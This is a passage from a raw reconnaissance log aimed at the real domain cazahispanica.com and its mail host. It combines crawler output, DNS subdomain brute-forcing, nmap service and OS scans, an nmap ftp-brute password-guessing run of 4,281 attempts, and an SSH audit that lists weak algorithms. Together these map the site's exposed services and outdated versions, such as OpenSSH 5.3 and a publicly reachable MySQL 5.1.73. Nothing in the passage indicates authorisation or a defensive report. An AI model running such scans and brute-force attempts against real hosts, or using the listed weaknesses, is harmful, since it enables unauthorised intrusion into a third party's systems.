1162 - http://webmail.cazahispanica.com./xframework/assets/scripts/ (404 Not Found)
1163 - http://webmail.cazahispanica.com./skins/ (403 Forbidden)
1164 - http://webmail.cazahispanica.com./skins/larry/ (403 Forbidden)
1165 - http://webmail.cazahispanica.com./skins/larry/images/ (403 Forbidden)
1166 - http://webmail.cazahispanica.com./images/ (403 Forbidden)
1167 - http://webmail.cazahispanica.com./plugins/ (403 Forbidden)
1168 - http://webmail.cazahispanica.com./plugins/jqueryui/ (403 Forbidden)
1169 - http://webmail.cazahispanica.com./plugins/jqueryui/themes/ (403 Forbidden)
1170 - http://webmail.cazahispanica.com./plugins/jqueryui/themes/larry/ (403 Forbidden)
1171 - http://webmail.cazahispanica.com./plugins/xskin/ (403 Forbidden)
1172 - http://webmail.cazahispanica.com./plugins/xskin/assets/ (403 Forbidden)
1173 - http://webmail.cazahispanica.com./plugins/xskin/assets/styles/ (403 Forbidden)
1174 - http://webmail.cazahispanica.com./program/ (403 Forbidden)
1175 - http://webmail.cazahispanica.com./program/js/ (403 Forbidden)
1176 - http://webmail.cazahispanica.com./plugins/jqueryui/js/ (403 Forbidden)
1177 - http://webmail.cazahispanica.com./plugins/xskin/assets/scripts/ (403 Forbidden)
1178 + Crawl finished successfully.
1179----------------------------------------------------------------------
1180Summary of http://http://webmail.cazahispanica.com.
1181----------------------------------------------------------------------
1182+ Links crawled:
1183 - http://webmail.cazahispanica.com.
1184 - http://webmail.cazahispanica.com./
1185 - http://webmail.cazahispanica.com./xframework/assets/scripts/framework.min.js?s=1497340056 (404 Not Found)
1186 - http://webmail.cazahispanica.com./xframework/assets/styles/framework.css?s=1497340056 (404 Not Found)
1187 Total links crawled: 4
1188
1189+ Links to files found:
1190 - http://webmail.cazahispanica.com./images/serviciodecorreo.es_bright.png
1191 - http://webmail.cazahispanica.com./plugins/jqueryui/js/jquery-ui-1.10.4.custom.min.js?s=1493368164
1192 - http://webmail.cazahispanica.com./plugins/jqueryui/themes/larry/jquery-ui-1.10.4.custom.css?s=1493368164
1193 - http://webmail.cazahispanica.com./plugins/xskin/assets/scripts/xdesktop.min.js?s=1497339944
1194 - http://webmail.cazahispanica.com./plugins/xskin/assets/scripts/xskin.min.js?s=1497339944
1195 - http://webmail.cazahispanica.com./plugins/xskin/assets/styles/xdesktop.css?s=1497339944
1196 - http://webmail.cazahispanica.com./program/js/app.min.js?s=1493368164
1197 - http://webmail.cazahispanica.com./program/js/common.min.js?s=1493368164
1198 - http://webmail.cazahispanica.com./program/js/jquery.min.js?s=1493368164
1199 - http://webmail.cazahispanica.com./program/js/jstz.min.js?s=1493368164
1200 - http://webmail.cazahispanica.com./skins/larry/images/favicon.ico
1201 - http://webmail.cazahispanica.com./skins/larry/styles.min.css?s=1493368165
1202 - http://webmail.cazahispanica.com./skins/larry/svggradients.min.css?s=1493368165
1203 - http://webmail.cazahispanica.com./skins/larry/ui.min.js?s=1493368165
1204 Total links to files: 14
1205
1206+ Externals links found:
1207 - https://serviciodecorreo.es/help/configuracion_serviciodecorreo.es.pdf
1208 - https://serviciodecorreo.es/images/serviciodecorreo.es_dark.png
1209 Total external links: 2
1210
1211+ Email addresses found:
1212 Total email address found: 0
1213
1214+ Directories found:
1215 - http://webmail.cazahispanica.com./images/ (403 Forbidden)
1216 - http://webmail.cazahispanica.com./plugins/ (403 Forbidden)
1217 - http://webmail.cazahispanica.com./plugins/jqueryui/ (403 Forbidden)
1218 - http://webmail.cazahispanica.com./plugins/jqueryui/js/ (403 Forbidden)
1219 - http://webmail.cazahispanica.com./plugins/jqueryui/themes/ (403 Forbidden)
1220 - http://webmail.cazahispanica.com./plugins/jqueryui/themes/larry/ (403 Forbidden)
1221 - http://webmail.cazahispanica.com./plugins/xskin/ (403 Forbidden)
1222 - http://webmail.cazahispanica.com./plugins/xskin/assets/ (403 Forbidden)
1223 - http://webmail.cazahispanica.com./plugins/xskin/assets/scripts/ (403 Forbidden)
1224 - http://webmail.cazahispanica.com./plugins/xskin/assets/styles/ (403 Forbidden)
1225 - http://webmail.cazahispanica.com./program/ (403 Forbidden)
1226 - http://webmail.cazahispanica.com./program/js/ (403 Forbidden)
1227 - http://webmail.cazahispanica.com./skins/ (403 Forbidden)
1228 - http://webmail.cazahispanica.com./skins/larry/ (403 Forbidden)
1229 - http://webmail.cazahispanica.com./skins/larry/images/ (403 Forbidden)
1230 - http://webmail.cazahispanica.com./xframework/ (404 Not Found)
1231 - http://webmail.cazahispanica.com./xframework/assets/ (404 Not Found)
1232 - http://webmail.cazahispanica.com./xframework/assets/scripts/ (404 Not Found)
1233 - http://webmail.cazahispanica.com./xframework/assets/styles/ (404 Not Found)
1234 Total directories: 19
1235
1236+ Directory indexing found:
1237 Total directories with indexing: 0
1238
1239----------------------------------------------------------------------
1240
1241
1242 + URL to crawl: https://webmail.cazahispanica.com.
1243 + Date: 2020-01-05
1244
1245 + Crawling URL: https://webmail.cazahispanica.com.:
1246 + Links:
1247 + Crawling https://webmail.cazahispanica.com.
1248 + Searching for directories...
1249 + Searching open folders...
1250
1251--Finished--
1252Summary information for domain cazahispanica.com.
1253-----------------------------------------
1254 Domain Specific Information:
1255 Email: info@cazahispanica.com
1256
1257 Domain Ips Information:
1258 IP: 82.223.212.0
1259 Type: SPF
1260 Is Active: True (reset ttl 64)
1261 IP: 217.76.143.0
1262 Type: SPF
1263 Is Active: True (reset ttl 64)
1264 IP: 82.223.208.0
1265 Type: SPF
1266 Is Active: True (reset ttl 64)
1267 IP: 82.223.199.0
1268 Type: SPF
1269 Is Active: True (reset ttl 64)
1270 IP: 82.223.113.0
1271 Type: SPF
1272 Is Active: True (reset ttl 64)
1273 IP: 82.223.218.0
1274 Type: SPF
1275 Is Active: True (reset ttl 64)
1276 IP: 217.160.131.142
1277 HostName: www.cazahispanica.com. Type: A
1278 Country: Germany
1279 Is Active: True (reset ttl 64)
1280 Port: 21/tcp open ftp syn-ack ttl 55 ProFTPD
1281 Script Info: | ssl-cert: Subject: commonName=Parallels Panel/organizationName=Parallels/stateOrProvinceName=Virginia/countryName=US
1282 Script Info: | Issuer: commonName=Parallels Panel/organizationName=Parallels/stateOrProvinceName=Virginia/countryName=US
1283 Script Info: | Public Key type: rsa
1284 Script Info: | Public Key bits: 2048
1285 Script Info: | Signature Algorithm: sha1WithRSAEncryption
1286 Script Info: | Not valid before: 2015-01-27T11:06:14
1287 Script Info: | Not valid after: 2016-01-27T11:06:14
1288 Script Info: | MD5: a6a6 4e22 2c06 27c2 58de c49a bb0d 1a38
1289 Script Info: |_SHA-1: 9907 1423 593d fbd3 32ec 7db7 e8fd b0b9 5581 3476
1290 Script Info: |_ssl-date: 2020-01-05T08:28:08+00:00; -3s from scanner time.
1291 Script Info: | tls-nextprotoneg:
1292 Script Info: |_ ftp
1293 Port: 22/tcp open ssh syn-ack ttl 55 OpenSSH 5.3 (protocol 2.0)
1294 Script Info: | ssh-hostkey:
1295 Script Info: | 1024 a8:a9:da:bc:cb:8d:0b:ee:5c:06:94:59:e9:e1:9e:6e (DSA)
1296 Script Info: |_ 2048 95:1e:62:e2:8f:bb:20:92:a7:f4:ab:a7:44:f6:37:f0 (RSA)
1297 Port: 80/tcp open http syn-ack ttl 55 Apache httpd (PleskLin)
1298 Script Info: |_http-favicon: Parallels Control Panel
1299 Script Info: | http-methods:
1300 Script Info: |_ Supported Methods: GET HEAD POST OPTIONS
1301 Script Info: |_http-server-header: Apache
1302 Script Info: |_http-title: Default Parallels Plesk Page
1303 Port: 443/tcp open ssl/http syn-ack ttl 55 Apache httpd (PleskLin)
1304 Script Info: |_http-favicon: Parallels Control Panel
1305 Script Info: | http-methods:
1306 Script Info: |_ Supported Methods: GET HEAD POST OPTIONS
1307 Script Info: |_http-server-header: Apache
1308 Script Info: |_http-title: Default Parallels Plesk Page
1309 Script Info: | ssl-cert: Subject: commonName=Parallels Panel/organizationName=Parallels/stateOrProvinceName=Virginia/countryName=US
1310 Script Info: | Issuer: commonName=Parallels Panel/organizationName=Parallels/stateOrProvinceName=Virginia/countryName=US
1311 Script Info: | Public Key type: rsa
1312 Script Info: | Public Key bits: 2048
1313 Script Info: | Signature Algorithm: sha1WithRSAEncryption
1314 Script Info: | Not valid before: 2015-01-27T11:06:14
1315 Script Info: | Not valid after: 2016-01-27T11:06:14
1316 Script Info: | MD5: a6a6 4e22 2c06 27c2 58de c49a bb0d 1a38
1317 Script Info: |_SHA-1: 9907 1423 593d fbd3 32ec 7db7 e8fd b0b9 5581 3476
1318 Script Info: |_ssl-date: 2020-01-05T08:28:07+00:00; -3s from scanner time.
1319 Port: 3306/tcp open mysql syn-ack ttl 55 MySQL 5.1.73
1320 Script Info: | mysql-info:
1321 Script Info: | Protocol: 10
1322 Script Info: | Version: 5.1.73
1323 Script Info: | Thread ID: 564831
1324 Script Info: | Capabilities flags: 63487
1325 Script Info: | Some Capabilities: Speaks41ProtocolOld, InteractiveClient, LongPassword, SupportsLoadDataLocal, Support41Auth, FoundRows, ConnectWithDatabase, LongColumnFlag, SupportsTransactions, SupportsCompression, IgnoreSigpipes, ODBCClient, IgnoreSpaceBeforeParenthesis, Speaks41ProtocolNew, DontAllowDatabaseTableColumn
1326 Script Info: | Status: Autocommit
1327 Script Info: |_ Salt: qEDdN7f|]<Trbq2EBZ"7
1328 Port: 8443/tcp open ssl/http syn-ack ttl 55 sw-cp-server httpd (Plesk Onyx 17.8.11)
1329 Script Info: |_http-favicon: Parallels Plesk
1330 Script Info: | http-methods:
1331 Script Info: |_ Supported Methods: GET HEAD POST
1332 Script Info: | http-robots.txt: 1 disallowed entry
1333 Script Info: |_/
1334 Script Info: |_http-server-header: sw-cp-server
1335 Script Info: |_http-title: Plesk Onyx 17.8.11
1336 Script Info: | ssl-cert: Subject: commonName=Parallels Panel/organizationName=Parallels/stateOrProvinceName=Virginia/countryName=US
1337 Script Info: | Issuer: commonName=Parallels Panel/organizationName=Parallels/stateOrProvinceName=Virginia/countryName=US
1338 Script Info: | Public Key type: rsa
1339 Script Info: | Public Key bits: 2048
1340 Script Info: | Signature Algorithm: sha1WithRSAEncryption
1341 Script Info: | Not valid before: 2015-01-27T11:06:14
1342 Script Info: | Not valid after: 2016-01-27T11:06:14
1343 Script Info: | MD5: a6a6 4e22 2c06 27c2 58de c49a bb0d 1a38
1344 Script Info: |_SHA-1: 9907 1423 593d fbd3 32ec 7db7 e8fd b0b9 5581 3476
1345 Script Info: |_ssl-date: 2020-01-05T08:28:07+00:00; -3s from scanner time.
1346 Script Info: | tls-nextprotoneg:
1347 Script Info: |_ http/1.1
1348 Script Info: Device type: general purpose|router|storage-misc|broadband router|WAP
1349 Script Info: Running (JUST GUESSING): Linux 2.6.X|3.X (92%), MikroTik RouterOS 6.X (91%), HP embedded (89%), Ubiquiti embedded (89%), Ubiquiti AirOS 5.X (88%), AVM FritzOS 6.X (87%), Hitron embedded (87%)
1350 Script Info: |_clock-skew: mean: -3s, deviation: 0s, median: -3s
1351 IP: 82.223.226.0
1352 Type: SPF
1353 Is Active: True (reset ttl 64)
1354 IP: 82.223.85.0
1355 Type: SPF
1356 Is Active: True (reset ttl 64)
1357 IP: 217.76.128.0
1358 Type: SPF
1359 Is Active: True (reset ttl 64)
1360 IP: 82.223.119.0
1361 Type: SPF
1362 Is Active: True (reset ttl 64)
1363 IP: 82.223.230.0
1364 Type: SPF
1365 Is Active: True (reset ttl 64)
1366 IP: 217.76.150.0
1367 Type: SPF
1368 Is Active: True (reset ttl 64)
1369 IP: 217.76.150.128
1370 Type: SPF
1371 Is Active: True (reset ttl 64)
1372 IP: 217.76.128.164
1373 HostName: dns47.servidoresdns.net Type: NS
1374 HostName: dns47.servidoresdns.net Type: PTR
1375 Country: Spain
1376 Is Active: True (reset ttl 64)
1377 Port: 53/tcp open domain syn-ack ttl 55 ISC BIND
1378 IP: 82.223.218.164
1379 HostName: dns48.servidoresdns.net Type: NS
1380 HostName: dns48.servidoresdns.net Type: PTR
1381 Country: Spain
1382 Is Active: True (reset ttl 64)
1383 Port: 53/tcp open domain syn-ack ttl 56 ISC BIND
1384 Port: 873/tcp open rsync syn-ack ttl 56 (protocol version 31)
1385 IP: 217.76.156.128
1386 Type: SPF
1387 Is Active: True (reset ttl 64)
1388 IP: 217.76.148.0
1389 Type: SPF
1390 Is Active: True (reset ttl 64)
1391 IP: 217.76.156.0
1392 Type: SPF
1393 Is Active: True (reset ttl 64)
1394 IP: 82.223.251.0
1395 Type: SPF
1396 Is Active: True (reset ttl 64)
1397 IP: 217.76.130.0
1398 Type: SPF
1399 Is Active: True (reset ttl 64)
1400 IP: 217.76.132.128
1401 Type: SPF
1402 Is Active: True (reset ttl 64)
1403 IP: 82.223.56.0
1404 Type: SPF
1405 Is Active: True (reset ttl 64)
1406 IP: 82.223.190.234
1407 HostName: webmail.cazahispanica.com. Type: A
1408 Country: Spain
1409 Is Active: True (reset ttl 64)
1410 Port: 80/tcp open http syn-ack ttl 55 nginx
1411 Script Info: | http-methods:
1412 Script Info: |_ Supported Methods: GET HEAD POST OPTIONS
1413 Script Info: |_http-title: Did not follow redirect to https://serviciodecorreo.es/
1414 Port: 443/tcp open ssl/http syn-ack ttl 55 nginx
1415 Script Info: | http-methods:
1416 Script Info: |_ Supported Methods: GET HEAD POST
1417 Script Info: | http-robots.txt: 1 disallowed entry
1418 Script Info: |_/
1419 Script Info: |_http-title: Webmail :: Welcome to Webmail
1420 Script Info: | ssl-cert: Subject: commonName=*.serviciodecorreo.es/organizationName=Arsys Internet S.L.U./stateOrProvinceName=La Rioja/countryName=ES
1421 Script Info: | Subject Alternative Name: DNS:*.serviciodecorreo.es, DNS:serviciodecorreo.es
1422 Script Info: | Issuer: commonName=Thawte RSA CA 2018/organizationName=DigiCert Inc/countryName=US
1423 Script Info: | Public Key type: rsa
1424 Script Info: | Public Key bits: 2048
1425 Script Info: | Signature Algorithm: sha256WithRSAEncryption
1426 Script Info: | Not valid before: 2018-04-03T00:00:00
1427 Script Info: | Not valid after: 2020-04-03T12:00:00
1428 Script Info: | MD5: 22c2 7e86 0420 22c3 1971 6285 22e9 2c4e
1429 Script Info: |_SHA-1: 1074 ed9e 57e8 e0ea c306 252e 0c74 ad7b ac1b 8e10
1430 Script Info: |_ssl-date: TLS randomness does not represent time
1431 Script Info: | tls-alpn:
1432 Script Info: |_ http/1.1
1433 Script Info: | tls-nextprotoneg:
1434 Script Info: |_ http/1.1
1435 Script Info: Running (JUST GUESSING): Linux 3.X|4.X (85%)
1436 IP: 82.223.190.0
1437 Type: SPF
1438 Is Active: True (reset ttl 64)
1439 IP: 82.223.190.100
1440 HostName: mx.serviciodecorreo.es Type: MX
1441 HostName: mx.serviciodecorreo.es Type: PTR
1442 Country: Spain
1443 Is Active: True (reset ttl 64)
1444
1445--------------End Summary --------------
1446-----------------------------------------
1447###################################################################################################################################
1448raceroute to www.cazahispanica.com (217.160.131.142), 30 hops max, 60 byte packets
1449 1 10.246.204.1 (10.246.204.1) 35.201 ms 35.181 ms 35.169 ms
1450 2 104.245.145.177 (104.245.145.177) 35.157 ms 35.143 ms 35.128 ms
1451 3 te0-1-1-9.219.ccr32.yyz02.atlas.cogentco.com (38.104.158.113) 35.114 ms 35.104 ms te0-0-2-1.225.nr11.b010988-1.yyz02.atlas.cogentco.com (38.104.156.9) 35.104 ms
1452 4 te0-0-0-1.agr13.yyz02.atlas.cogentco.com (154.24.54.37) 59.043 ms 59.023 ms te0-0-0-1.agr14.yyz02.atlas.cogentco.com (154.24.54.41) 58.983 ms
1453 5 toro-b3-link.telia.net (62.115.116.180) 34.997 ms 34.993 ms te0-9-0-9.ccr31.yyz02.atlas.cogentco.com (154.54.43.141) 34.980 ms
1454 6 * tinet.yyz02.atlas.cogentco.com (154.54.9.2) 60.268 ms 60.204 ms
1455 7 et-0-0-71.cr2-fra2.ip4.gtt.net (141.136.110.50) 130.267 ms ldn-bb3-link.telia.net (62.115.113.21) 130.166 ms et-0-0-71.cr2-fra2.ip4.gtt.net (141.136.110.50) 130.212 ms
1456 8 prs-bb3-link.telia.net (62.115.134.92) 152.096 ms 130.190 ms tinet-up.bb-a.fra3.fra.de.oneandone.net (213.200.65.202) 130.157 ms
1457 9 ae-14.bb-b.fr7.fra.de.oneandone.net (212.227.120.149) 152.074 ms ffm-bb3-link.telia.net (62.115.123.12) 152.158 ms 152.117 ms
145810 ae-9.bb-b.bs.kae.de.oneandone.net (212.227.120.168) 152.024 ms 181.699 ms ffm-b1-link.telia.net (62.115.121.5) 181.678 ms
145911 ionos-ic-350360-ffm-b1.c.telia.net (62.115.181.11) 181.626 ms 196.182 ms 196.123 ms
146012 ae-1.gw-prtr-a0110-a.kw.nbz.fr.oneandone.net (195.20.243.81) 196.015 ms * ae-9.bb-b.bs.kae.de.oneandone.net (212.227.120.168) 196.027 ms
146113 ae-2.gw-distp-a.kw.nbz.fr.oneandone.net (195.20.243.35) 196.019 ms * *
146214 ae-1.gw-prtr-a0110-a.kw.nbz.fr.oneandone.net (195.20.243.81) 195.894 ms * s18161039.onlinehome-server.info (217.160.131.142) 195.756 ms
1463###################################################################################################################################
1464----- cazahispanica.com -----
1465
1466
1467Host's addresses:
1468__________________
1469
1470cazahispanica.com. 3067 IN A 217.160.131.142
1471
1472
1473Name Servers:
1474______________
1475
1476dns47.servidoresdns.net. 3290 IN A 217.76.128.164
1477dns48.servidoresdns.net. 10644 IN A 82.223.218.164
1478
1479
1480Mail (MX) Servers:
1481___________________
1482
1483mx.serviciodecorreo.es. 3301 IN A 82.223.190.100
1484
1485
1486Brute forcing with /usr/share/dnsenum/dns.txt:
1487_______________________________________________
1488
1489webmail.cazahispanica.com. 2769 IN CNAME serviciodecorreo.es.
1490serviciodecorreo.es. 2769 IN A 82.223.190.234
1491www.cazahispanica.com. 2210 IN A 217.160.131.142
1492
1493
1494Launching Whois Queries:
1495_________________________
1496
1497 whois ip result: 217.160.131.0 -> 217.160.131.0/24
1498
1499
1500cazahispanica.com_________________
1501
1502 217.160.131.0/24
1503
1504###################################################################################################################################
1505Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-05 03:19 EST
1506Nmap scan report for s18161039.onlinehome-server.info (217.160.131.142)
1507Host is up (0.16s latency).
1508Not shown: 469 closed ports
1509PORT STATE SERVICE VERSION
151021/tcp open ftp ProFTPD
1511| ssl-cert: Subject: commonName=Parallels Panel/organizationName=Parallels/stateOrProvinceName=Virginia/countryName=US
1512| Not valid before: 2015-01-27T11:06:14
1513|_Not valid after: 2016-01-27T11:06:14
1514|_ssl-date: 2020-01-05T08:19:43+00:00; -3s from scanner time.
1515| tls-nextprotoneg:
1516|_ ftp
151722/tcp open ssh OpenSSH 5.3 (protocol 2.0)
1518| ssh-hostkey:
1519| 1024 a8:a9:da:bc:cb:8d:0b:ee:5c:06:94:59:e9:e1:9e:6e (DSA)
1520|_ 2048 95:1e:62:e2:8f:bb:20:92:a7:f4:ab:a7:44:f6:37:f0 (RSA)
152180/tcp open http Apache httpd (PleskLin)
1522|_http-favicon: Parallels Control Panel
1523|_http-server-header: Apache
1524|_http-title: Domain Default page
1525443/tcp open ssl/http Apache httpd (PleskLin)
1526|_http-favicon: Parallels Control Panel
1527|_http-server-header: Apache
1528|_http-title: Domain Default page
1529| ssl-cert: Subject: commonName=Parallels Panel/organizationName=Parallels/stateOrProvinceName=Virginia/countryName=US
1530| Not valid before: 2015-01-27T11:06:14
1531|_Not valid after: 2016-01-27T11:06:14
1532|_ssl-date: 2020-01-05T08:19:43+00:00; -3s from scanner time.
15333306/tcp open mysql MySQL 5.1.73
1534| mysql-info:
1535| Protocol: 10
1536| Version: 5.1.73
1537| Thread ID: 563845
1538| Capabilities flags: 63487
1539| Some Capabilities: LongColumnFlag, ConnectWithDatabase, SupportsCompression, Speaks41ProtocolOld, DontAllowDatabaseTableColumn, LongPassword, SupportsTransactions, Support41Auth, FoundRows, IgnoreSpaceBeforeParenthesis, IgnoreSigpipes, ODBCClient, Speaks41ProtocolNew, InteractiveClient, SupportsLoadDataLocal
1540| Status: Autocommit
1541|_ Salt: f.N~Te"r=xft7Po^gke7
15428443/tcp open ssl/http sw-cp-server httpd (Plesk Onyx 17.8.11)
1543|_http-favicon: Parallels Plesk
1544| http-robots.txt: 1 disallowed entry
1545|_/
1546|_http-server-header: sw-cp-server
1547|_http-title: Plesk Onyx 17.8.11
1548| ssl-cert: Subject: commonName=Parallels Panel/organizationName=Parallels/stateOrProvinceName=Virginia/countryName=US
1549| Not valid before: 2015-01-27T11:06:14
1550|_Not valid after: 2016-01-27T11:06:14
1551|_ssl-date: 2020-01-05T08:19:43+00:00; -3s from scanner time.
1552| tls-nextprotoneg:
1553|_ http/1.1
15548880/tcp open http sw-cp-server httpd (Plesk Onyx 17.8.11)
1555|_http-favicon: Parallels Plesk
1556| http-robots.txt: 1 disallowed entry
1557|_/
1558|_http-server-header: sw-cp-server
1559|_http-title: Plesk Onyx 17.8.11
1560Aggressive OS guesses: Linux 2.6.32 - 3.13 (95%), Linux 2.6.32 (94%), Linux 2.6.32 - 2.6.39 (94%), Linux 2.6.32 - 3.1 (94%), Linux 2.6.39 (94%), HP P2000 G3 NAS device (93%), Linux 2.6.32 - 3.10 (92%), Linux 2.6.32 - 3.9 (92%), Linux 3.10 (92%), Linux 3.2 (92%)
1561No exact OS matches for host (test conditions non-ideal).
1562Network Distance: 15 hops
1563
1564Host script results:
1565|_clock-skew: mean: -3s, deviation: 0s, median: -3s
1566
1567TRACEROUTE (using port 443/tcp)
1568HOP RTT ADDRESS
15691 86.82 ms 10.246.204.1
15702 87.19 ms 104.245.145.177
15713 87.26 ms te0-1-1-9.219.ccr32.yyz02.atlas.cogentco.com (38.104.158.113)
15724 55.72 ms toro-b1-link.telia.net (62.115.168.48)
15735 137.31 ms te0-9-1-9.ccr31.yyz02.atlas.cogentco.com (154.54.43.161)
15746 105.41 ms tinet.yyz02.atlas.cogentco.com (154.54.9.2)
15757 199.05 ms et-0-0-71.cr2-fra2.ip4.gtt.net (141.136.110.50)
15768 199.03 ms tinet-up.bb-a.fra3.fra.de.oneandone.net (213.200.65.202)
15779 229.01 ms ae-10-0.bb-a.bap.rhr.de.oneandone.net (212.227.120.147)
157810 228.98 ms ffm-b1-link.telia.net (62.115.137.129)
157911 229.02 ms ae-1.gw-prtr-a0110-a.kw.nbz.fr.oneandone.net (195.20.243.81)
158012 229.01 ms ae-9.bb-b.bs.kae.de.oneandone.net (212.227.120.168)
158113 229.02 ms ae-2.gw-distp-a.kw.nbz.fr.oneandone.net (195.20.243.35)
158214 137.47 ms ae-1.gw-prtr-a0110-a.kw.nbz.fr.oneandone.net (195.20.243.81)
158315 193.03 ms s18161039.onlinehome-server.info (217.160.131.142)
1584###################################################################################################################################
1585Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-05 03:19 EST
1586Warning: 217.160.131.142 giving up on port because retransmission cap hit (2).
1587Nmap scan report for s18161039.onlinehome-server.info (217.160.131.142)
1588Host is up (0.16s latency).
1589Not shown: 22 closed ports, 2 filtered ports
1590Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
1591PORT STATE SERVICE VERSION
159267/udp open|filtered dhcps
159388/udp open|filtered kerberos-sec
1594123/udp open|filtered ntp
1595520/udp open|filtered route
1596Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
1597Device type: WAP|broadband router|remote management
1598Running (JUST GUESSING): Aerohive HiveOS 6.X (96%), Arris embedded (96%), Linux 2.6.X (96%), Aruba ArubaOS 6.X (96%), Asus embedded (96%), AVM FritzOS 6.X (96%), Avocent embedded (96%), Belkin embedded (96%)
1599OS CPE: cpe:/o:aerohive:hiveos:6.1 cpe:/o:linux:linux_kernel:2.6.18 cpe:/h:arris:tg862 cpe:/o:arubanetworks:arubaos:6.4.2.6 cpe:/h:asus:rt-ac66u cpe:/o:avm:fritzos:6.20 cpe:/o:avm:fritzos:6.51 cpe:/h:belkin:n300
1600Aggressive OS guesses: Aerohive HiveOS 6.1 (96%), Arris cable modem (Linux 2.6.18) (96%), Arris TG862 WAP (96%), Aruba Instant AP (ArubaOS 6.4.2.6) (96%), Asus RT-AC66U router (Linux 2.6) (96%), AVM FRITZ!Box (FritzOS 6.20) (96%), AVM FRITZ!WLAN Repeater 450E (FritzOS 6.51) (96%), Avocent MergePoint Unity MPU2016DAC KVM switch (96%), Belkin N300 WAP (Linux 2.6.30) (96%), D-Link DIR-615, Encore 3G, or EnGenius ESR-9752 WAP (96%)
1601No exact OS matches for host (test conditions non-ideal).
1602Network Distance: 18 hops
1603
1604TRACEROUTE (using port 138/udp)
1605HOP RTT ADDRESS
16061 ... 8
16079 30.34 ms 10.246.204.1
160810 ... 11
160912 29.60 ms 10.246.204.1
161013 64.70 ms 10.246.204.1
161114 64.69 ms 10.246.204.1
161215 64.69 ms 10.246.204.1
161316 64.69 ms 10.246.204.1
161417 64.67 ms 10.246.204.1
161518 30.43 ms 10.246.204.1
161619 29.70 ms 10.246.204.1
161720 31.04 ms 10.246.204.1
161821 ... 27
161928 30.05 ms 10.246.204.1
162029 ...
162130 30.66 ms 10.246.204.1
1622####################################################################################################################################
1623Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-05 03:20 EST
1624NSE: [ftp-brute] usernames: Time limit 3m00s exceeded.
1625NSE: [ftp-brute] usernames: Time limit 3m00s exceeded.
1626NSE: [ftp-brute] passwords: Time limit 3m00s exceeded.
1627Nmap scan report for s18161039.onlinehome-server.info (217.160.131.142)
1628Host is up (0.16s latency).
1629
1630PORT STATE SERVICE VERSION
163121/tcp open ftp ProFTPD
1632| ftp-brute:
1633| Accounts: No valid accounts found
1634|_ Statistics: Performed 4281 guesses in 181 seconds, average tps: 22.9
1635Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
1636Aggressive OS guesses: Linux 2.6.32 (95%), Linux 3.8 (95%), Linux 2.6.32 - 3.10 (95%), Linux 2.6.32 - 3.13 (95%), Linux 2.6.32 - 3.9 (95%), Linux 3.2 (95%), Linux 2.6.32 - 3.1 (94%), Linux 3.1 (94%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), Linux 2.6.32 - 2.6.39 (94%)
1637No exact OS matches for host (test conditions non-ideal).
1638Network Distance: 13 hops
1639
1640TRACEROUTE (using port 21/tcp)
1641HOP RTT ADDRESS
16421 52.35 ms 10.246.204.1
16432 83.83 ms 104.245.145.177
16443 63.24 ms te0-1-1-9.219.ccr32.yyz02.atlas.cogentco.com (38.104.158.113)
16454 71.35 ms toro-b1-link.telia.net (62.115.168.48)
16465 60.87 ms toro-b3-link.telia.net (62.115.116.180)
16476 101.57 ms nyk-bb2-link.telia.net (62.115.113.86)
16487 174.35 ms et-0-0-71.cr2-fra2.ip4.gtt.net (141.136.110.50)
16498 174.35 ms tinet-up.bb-a.fra3.fra.de.oneandone.net (213.200.65.202)
16509 174.40 ms ae-10-0.bb-a.bap.rhr.de.oneandone.net (212.227.120.147)
165110 174.42 ms ffm-b1-link.telia.net (62.115.121.5)
165211 174.41 ms ae-1.gw-prtr-a0110-a.kw.nbz.fr.oneandone.net (195.20.243.81)
165312 174.44 ms ae-9.bb-b.bs.kae.de.oneandone.net (212.227.120.168)
165413 174.44 ms s18161039.onlinehome-server.info (217.160.131.142)
1655###################################################################################################################################
1656# general
1657(gen) banner: SSH-2.0-OpenSSH_5.3
1658(gen) software: OpenSSH 5.3
1659(gen) compatibility: OpenSSH 5.9-6.6, Dropbear SSH 2013.56+ (some functionality from 0.52)
1660(gen) compression: enabled (zlib@openssh.com)
1661
1662# key exchange algorithms
1663(kex) diffie-hellman-group-exchange-sha256 -- [warn] using custom size modulus (possibly weak)
1664 `- [info] available since OpenSSH 4.4
1665(kex) diffie-hellman-group-exchange-sha1 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
1666 `- [warn] using weak hashing algorithm
1667 `- [info] available since OpenSSH 2.3.0
1668(kex) diffie-hellman-group14-sha1 -- [warn] using weak hashing algorithm
1669 `- [info] available since OpenSSH 3.9, Dropbear SSH 0.53
1670(kex) diffie-hellman-group1-sha1 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
1671 `- [fail] disabled (in client) since OpenSSH 7.0, logjam attack
1672 `- [warn] using small 1024-bit modulus
1673 `- [warn] using weak hashing algorithm
1674 `- [info] available since OpenSSH 2.3.0, Dropbear SSH 0.28
1675
1676# host-key algorithms
1677(key) ssh-rsa -- [info] available since OpenSSH 2.5.0, Dropbear SSH 0.28
1678(key) ssh-dss -- [fail] removed (in server) and disabled (in client) since OpenSSH 7.0, weak algorithm
1679 `- [warn] using small 1024-bit modulus
1680 `- [warn] using weak random number generator could reveal the key
1681 `- [info] available since OpenSSH 2.1.0, Dropbear SSH 0.28
1682
1683# encryption algorithms (ciphers)
1684(enc) aes128-ctr -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52
1685(enc) aes192-ctr -- [info] available since OpenSSH 3.7
1686(enc) aes256-ctr -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52
1687(enc) arcfour256 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
1688 `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
1689 `- [warn] using weak cipher
1690 `- [info] available since OpenSSH 4.2
1691(enc) arcfour128 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
1692 `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
1693 `- [warn] using weak cipher
1694 `- [info] available since OpenSSH 4.2
1695(enc) aes128-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
1696 `- [warn] using weak cipher mode
1697 `- [info] available since OpenSSH 2.3.0, Dropbear SSH 0.28
